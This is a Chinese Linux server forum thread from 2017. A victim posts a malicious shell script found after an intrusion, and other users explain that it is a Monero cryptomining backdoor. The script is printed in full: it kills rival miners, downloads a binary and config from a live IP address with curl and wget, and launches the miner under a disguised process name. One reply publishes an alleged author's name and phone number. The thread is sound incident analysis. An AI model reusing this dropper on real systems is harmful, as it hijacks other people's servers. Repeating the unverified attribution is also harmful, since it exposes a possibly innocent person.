找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 103|回复: 16

服务器被入侵了。求大神帮忙看看这脚本啥意思

[复制链接]

69

主题

671

回帖

1603

积分

金牌会员

积分
1603
发表于 2017-5-22 15:37:32 | 显示全部楼层 |阅读模式
本帖最后由 moker 于 2017-5-22 15:47 编辑
[ol]
  • #!/bin/sh
  • rm -rf /var/tmp/cebjtlbny.conf
  • rm -rf /var/tmp/qsbfhbjcp.conf
  • rm -rf /var/tmp/dcdvzfanm.conf
  • rm -rf /var/tmp/agetty
  • ps auxf|grep -v grep|grep -v vbwdlkfjm|grep "/tmp/"|awk '{print $2}'|xargs kill -9
  • ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
  • ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
  • ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
  • ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
  • ps auxf|grep -v grep|grep "cebjtlbny"|awk '{print $2}'|xargs kill -9
  • ps auxf|grep -v grep|grep "qsbfhbjcp"|awk '{print $2}'|xargs kill -9
  • ps auxf|grep -v grep|grep "dcdvzfanm"|awk '{print $2}'|xargs kill -9
  • ps -fe|grep vbwdlkfjm|grep -v grep
  • if [ $? -ne 0 ]
  • then
  • echo "start process....."
  • chmod 777 /var/tmp/vbwdlkfjm.conf
  • rm -rf /var/tmp/vbwdlkfjm.conf
  • curl -o /var/tmp/vbwdlkfjm.conf http://91.230.47.40/common/kworker.conf
  • wget -O /var/tmp/vbwdlkfjm.conf http://91.230.47.40/common/kworker.conf
  • chmod 777 /var/tmp/irqbalance
  • rm -rf /var/tmp/irqbalance
  • cat /proc/cpuinfo|grep aes>/dev/null
  • if [ $? -ne 1 ]
  • then
  • curl -o /var/tmp/irqbalance http://91.230.47.40/common/kworker
  • wget -O /var/tmp/irqbalance http://91.230.47.40/common/kworker
  • else
  • curl -o /var/tmp/irqbalance http://91.230.47.40/common/kworker_na
  • wget -O /var/tmp/irqbalance http://91.230.47.40/common/kworker_na
  • fi
  • chmod +x /var/tmp/irqbalance
  • cd /var/tmp
  • proc=`grep -c ^processor /proc/cpuinfo`
  • cores=$((($proc+1)/2))
  • num=$(($cores*3))
  • /sbin/sysctl -w vm.nr_hugepages=`$num`
  • nohup ./irqbalance -c vbwdlkfjm.conf -t `echo $cores` >/dev/null &
  • else
  • echo "runing....."
  • fi
  • [/ol]复制代码

    本人小白,看不懂,求大神指点。另外请问如何查到对方是怎么入侵的呢
    另外,无法用netstat 查看端口,没有任何提示就是无回显
  • 回复

    使用道具 举报

    375

    主题

    1275

    回帖

    3773

    积分

    论坛元老

    积分
    3773
    发表于 2017-5-22 15:39:23 | 显示全部楼层
    yc022t大概的意思是在指定的网址下载木马吧?
    回复

    使用道具 举报

    192

    主题

    2096

    回帖

    4908

    积分

    论坛元老

    积分
    4908
    发表于 2017-5-22 15:44:11 | 显示全部楼层
    本帖最后由 总是吵架的猪 于 2017-5-22 15:50 编辑

    研究了一下 这个是挖矿的 估计用你的服务挖比特币的 奶奶的
    回复

    使用道具 举报

    69

    主题

    671

    回帖

    1603

    积分

    金牌会员

    积分
    1603
     楼主| 发表于 2017-5-22 15:51:56 | 显示全部楼层

    总是吵架的猪 发表于 2017-5-22 15:44

    研究了一下 这个是挖矿的 估计用你的服务挖比特币的 奶奶的

    这是那个配置文件里的,意思是木马上线的地址和帐户吗
    回复

    使用道具 举报

    69

    主题

    671

    回帖

    1603

    积分

    金牌会员

    积分
    1603
     楼主| 发表于 2017-5-22 15:44:00 | 显示全部楼层

    总是吵架的猪 发表于 2017-5-22 15:44

    研究了一下 这个是挖矿的 估计用你的服务挖比特币的 奶奶的

    大神,怎么看出来的,求指点
    回复

    使用道具 举报

    8

    主题

    541

    回帖

    1176

    积分

    金牌会员

    积分
    1176
    发表于 2017-5-22 15:53:00 | 显示全部楼层
    本帖最后由 0000000 于 2017-5-22 16:21 编辑

    下载的一个后门 连接到指定HTTP jsonRPC地址收指令  本地不做监听的
    指令地址: pool.minexmr.com
    此后门挺全面 集成了Curl http Sock5 ldap Tftp  奇葩的是 这东西还自带比特币挖矿功能!!!.(https://github.com/pooler/cpuminer)

    目测作者是英国人    机房用了OVH法国  可以给作者打个电话试试: (+44.7545733224) ALEXIS ENSTON
    回复

    使用道具 举报

    69

    主题

    671

    回帖

    1603

    积分

    金牌会员

    积分
    1603
     楼主| 发表于 2017-5-22 15:44:00 | 显示全部楼层

    0000000 发表于 2017-5-22 15:56

    下载的一个后门 连接到指定HTTP jsonRPC地址收指令  本地不做监听的

    无法用netstat 查看端口,没有任何提示就是无回显,这个怎么搞呢
    回复

    使用道具 举报

    8

    主题

    541

    回帖

    1176

    积分

    金牌会员

    积分
    1176
    发表于 2017-5-22 15:56:48 | 显示全部楼层
    nohup ./irqbalance -c vbwdlkfjm.conf -t `echo $cores` >/dev/null  &

    >/dev/null  这个不要 就有日志了
    回复

    使用道具 举报

    45

    主题

    1142

    回帖

    2449

    积分

    金牌会员

    积分
    2449
    发表于 2017-5-22 16:10:48 | 显示全部楼层
    用你的服务器挖矿 挖的门罗币
    http://www.minexmr.com/ 底下输入43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R 可以查到他的挖矿历史记录
    到现在一共才挖了72.6个  按现在市价大约1.8w RMB的样子yc010t看大佬们的评论长见识了
    回复

    使用道具 举报

    49

    主题

    1077

    回帖

    2393

    积分

    金牌会员

    积分
    2393
    发表于 2017-5-22 15:56:00 | 显示全部楼层
    楼主备份数据重装系统吧,根据描述系统文件已经被替换,以前见过类似的病毒。
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|手机版|小黑屋|Discuz! X

    GMT+8, 2025-4-20 11:51 , Processed in 0.019586 second(s), 4 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表